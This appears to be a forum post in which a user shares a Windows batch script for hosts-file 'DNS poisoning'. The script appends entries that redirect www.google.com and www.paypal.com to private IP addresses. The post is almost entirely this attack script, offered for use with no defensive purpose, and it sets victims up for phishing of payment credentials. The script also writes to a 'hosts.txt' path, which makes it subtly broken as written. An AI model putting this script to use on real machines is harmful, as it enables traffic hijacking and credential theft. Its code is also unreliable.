Login Register


DNS Poisoning with batch filter_list
Author
Message
DNS Poisoning with batch #2
Hey guys,
just a few lines of code to create a batch file that does some serious DNS poisoning.
remember to save as .bat:

@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit

Reply





Messages In This Thread
DNS Poisoning with batch - by Smartius - 04-25-2014, 12:47 AM
DNS Poisoning with batch - by Smartius - 04-25-2014, 12:47 AM



Users browsing this thread: